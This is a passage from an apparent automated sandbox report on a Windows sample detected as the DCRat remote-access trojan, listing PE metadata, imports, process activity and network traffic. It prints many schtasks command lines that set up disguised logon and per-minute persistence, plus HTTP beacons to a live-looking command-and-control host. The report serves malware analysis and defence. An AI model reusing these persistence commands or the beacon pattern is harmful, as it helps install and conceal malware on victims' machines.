                • [IMP] VS2008 SP1 build 30729
                • [C++] VS2015 UPD3.1 build 24215
                • [EXP] VS2015 UPD3.1 build 24215
                • [RES] VS2015 UPD3 build 24213
                • [LNK] VS2015 UPD3.1 build 24215

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x630000xdfd00xe000f6c0f34fae6331b50a7ad2efc4bfefdbFalse0.6370326450892857data6.6367506404157535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                RT_ICON0x657480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                RT_ICON0x65cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                RT_ICON0x665580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                RT_ICON0x674000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                RT_ICON0x678680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                RT_ICON0x689100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                RT_DIALOG0x6f5880x286dataEnglishUnited States0.5092879256965944
                RT_DIALOG0x6f3580x13adataEnglishUnited States0.60828025477707
                RT_DIALOG0x6f4980xecdataEnglishUnited States0.6991525423728814
                RT_DIALOG0x6f2280x12edataEnglishUnited States0.5927152317880795
                RT_DIALOG0x6eef00x338dataEnglishUnited States0.45145631067961167
                RT_DIALOG0x6ec980x252dataEnglishUnited States0.5757575757575758
                RT_STRING0x6ff680x1e2dataEnglishUnited States0.3900414937759336
                RT_STRING0x701500x1ccdataEnglishUnited States0.4282608695652174
                RT_STRING0x703200x1b8dataEnglishUnited States0.45681818181818185
                RT_STRING0x704d80x146dataEnglishUnited States0.5153374233128835
                RT_STRING0x706200x446dataEnglishUnited States0.340036563071298
                RT_STRING0x70a680x166dataEnglishUnited States0.49162011173184356
                RT_STRING0x70bd00x152dataEnglishUnited States0.5059171597633136
                RT_STRING0x70d280x10adataEnglishUnited States0.49624060150375937
                RT_STRING0x70e380xbcdataEnglishUnited States0.6329787234042553
                RT_STRING0x70ef80xd6dataEnglishUnited States0.5747663551401869
                RT_GROUP_ICON0x6ec300x68dataEnglishUnited States0.7019230769230769
                RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                Imports

                DLLImport
                KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jun 17, 2024 06:07:09.745145082 CEST4973180192.168.2.4185.26.122.81
                Jun 17, 2024 06:07:09.751105070 CEST8049731185.26.122.81192.168.2.4
                Jun 17, 2024 06:07:09.751220942 CEST4973180192.168.2.4185.26.122.81
                Jun 17, 2024 06:07:09.751903057 CEST4973180192.168.2.4185.26.122.81
                Jun 17, 2024 06:07:09.756707907 CEST8049731185.26.122.81192.168.2.4
                Jun 17, 2024 06:07:10.628580093 CEST8049731185.26.122.81192.168.2.4
                Jun 17, 2024 06:07:10.648617983 CEST4973180192.168.2.4185.26.122.81
                Jun 17, 2024 06:07:10.653553009 CEST8049731185.26.122.81192.168.2.4
                Jun 17, 2024 06:07:10.914865017 CEST8049731185.26.122.81192.168.2.4
                Jun 17, 2024 06:07:10.927247047 CEST4973180192.168.2.4185.26.122.81

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jun 17, 2024 06:07:09.641362906 CEST6082153192.168.2.41.1.1.1
                Jun 17, 2024 06:07:09.737128019 CEST53608211.1.1.1192.168.2.4

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jun 17, 2024 06:07:09.641362906 CEST192.168.2.41.1.1.10x8ee4Standard query (0)host1871899.hostland.proA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jun 17, 2024 06:07:09.737128019 CEST1.1.1.1192.168.2.40x8ee4No error (0)host1871899.hostland.pro185.26.122.81A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • host1871899.hostland.pro

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449731185.26.122.81806884C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe
                TimestampBytes transferredDirectionData
                Jun 17, 2024 06:07:09.751903057 CEST400OUTGET /L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X HTTP/1.1
                Accept: */*
                Content-Type: text/css
                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                Host: host1871899.hostland.pro
                Connection: Keep-Alive
                Jun 17, 2024 06:07:10.628580093 CEST351INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 17 Jun 2024 04:07:10 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 146
                Connection: keep-alive
                Status: 403 Forbidden by IP restrictions
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Jun 17, 2024 06:07:10.648617983 CEST376OUTGET /L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X HTTP/1.1
                Accept: */*
                Content-Type: text/css
                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                Host: host1871899.hostland.pro
                Jun 17, 2024 06:07:10.914865017 CEST351INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 17 Jun 2024 04:07:10 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 146
                Connection: keep-alive
                Status: 403 Forbidden by IP restrictions
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:00:06:55
                Start date:17/06/2024
                Path:C:\Users\user\Desktop\DFpUKTL6kg.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\DFpUKTL6kg.exe"
                Imagebase:0x9f0000
                File size:1'164'929 bytes
                MD5 hash:23A1767D4E77693BD46F3ABFCF10E4D7
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                General

                Target ID:1
                Start time:00:06:56
                Start date:17/06/2024
                Path:C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe"
                Imagebase:0x90000
                File size:147'456 bytes
                MD5 hash:FF00E0480075B095948000BDC66E81F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                General

                Target ID:2
                Start time:00:07:05
                Start date:17/06/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" "
                Imagebase:0x240000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:3
                Start time:00:07:05
                Start date:17/06/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:4
                Start time:00:07:05
                Start date:17/06/2024
                Path:C:\chainSurrogate\browsersvc.exe
                Wow64 process (32bit):false
                Commandline:"C:\chainSurrogate\browsersvc.exe"
                Imagebase:0xc30000
                File size:847'872 bytes
                MD5 hash:05CF6D069F5B66212AF39C9D6C440CCE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1771032686.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 88%, ReversingLabs
                • Detection: 69%, Virustotal, Browse
                Reputation:low
                Has exited:true

                General

                Target ID:5
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:6
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:7
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:8
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:9
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:10
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:11
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:12
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:13
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:14
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:15
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:16
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:17
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:18
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:19
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:20
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:21
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:22
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:23
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:24
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:25
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 8 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:26
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:27
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:28
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:29
                Start time:00:07:07
                Start date:17/06/2024
